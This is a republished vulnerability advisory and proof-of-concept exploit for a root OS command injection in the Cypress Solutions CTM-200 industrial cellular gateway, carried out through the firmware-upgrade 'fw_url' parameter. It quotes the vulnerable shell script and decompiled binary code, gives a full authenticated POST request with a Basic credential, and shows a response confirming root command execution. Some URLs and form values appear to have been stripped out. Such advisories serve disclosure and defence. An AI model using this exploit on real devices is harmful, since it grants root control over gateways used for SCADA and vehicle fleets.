Saturday, October 30, 2021

Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection

# Exploit Title: Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage:

Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection

Vendor: Cypress Solutions Inc.
Product web page:
Affected version:

Summary: CTM-200 is the industrial cellular wireless gateway for fixed and mobile applications.
The CTM-200 is a Linux based platform powered by ARM Cortex-A8 800 MHz superscalar processor.
Its on-board standard features make the CTM-200 ideal for mobile fleet applications or fixed site
office and SCADA communications.

Desc: The CTM-200 wireless gateway suffers from an authenticated semi-blind OS command injection
vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user
through the '' script leveraging the 'fw_url' POST parameter used in the cmd
upgreadefw as argument, called by ctmsys() as pointer to execv() and make_wget_url() function to
the wget command in /usr/bin/cmdmain ELF binary.


136:    if ! empty "$FORM_install_fw_url"; then
137:         echo "</pre>"
138:       echo "<br />Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!<br /><pre>"
139:                 cmd upgradefw "$FORM_fw_url"
140:                 unset FORM_install_fw_url FORM_submit
141:                 echo "</pre><br />Done."
142:    fi
cmdmain (ELF):

    sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
            *(undefined4 *)(iParm2 + 8));
    sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8));
    iVar3 = ctm_fopen(local_184,"r");
    if (iVar3 == 0) {
      uVar5 = *(undefined4 *)(iParm2 + 8);
      __s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &";
      goto LAB_0001f4a8;
    sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
            *(undefined4 *)(iParm2 + 8));
cmd (ELF):

              while (sVar1 = strlen(__s2), uVar7 < sVar1) {
                __s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2);
                __s2 = *ppcVar8;
                uVar7 = uVar7 + 1;
              uStack180 = 0x7273752f;
              uStack176 = 0x6e69622f;
              uStack172 = 0x646d632f;
              uStack168 = 0x6d632f73;
              uStack164 = 0x69616d64;
              uStack160 = 0x6e;
              uStack159 = 0;
              iVar2 = execv((char *)&uStack180,ppcParm2);

Tested on: GNU/Linux (arm4tl)
           BusyBox v1.15.3

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2021-5687
Advisory URL:



PoC POST request:

POST /cgi-bin/webif/ HTTP/1.1
Connection: keep-alive
Content-Length: 611
Cache-Control: max-age=0
Authorization: Basic YWRtaW46Q2hhbWVsZW9u
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cookie: style=null
sec-gpc: 1

Content-Disposition: form-data; name="submit"

Content-Disposition: form-data; name="upgradefile"; filename=""
Content-Type: application/octet-stream

Content-Disposition: form-data; name="fw_url"

Content-Disposition: form-data; name="install_fw_url"

Start Firmware Upgrade from URL
Content-Disposition: form-data; name="pkgurl"



HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "http: //">
<html xmlns="http: //" lang="en" xml:lang="en">
Firmware Management

Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
Saving configuration ...
downloading firmware image: gid=0(root)/uid=0(root).tar
found image:
extracting image files
Verifying checksum of downloaded firmware image
Image checksum failed

<br />
<fieldset id="save">
    <legend><strong>Proceed Changes</strong></legend>
    <div class="page-save"><input id="savebutton" type="submit" name="action" value="Save Changes to Page" /></div>
    <ul class="apply">
        <li><a href="" rel="lightbox" >&raquo; Save Configuration &laquo;</a></li>
<hr />
<div id="footer">
    <em>End user extensions for OpenWrt</em>
</div> <!-- End #container -->

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore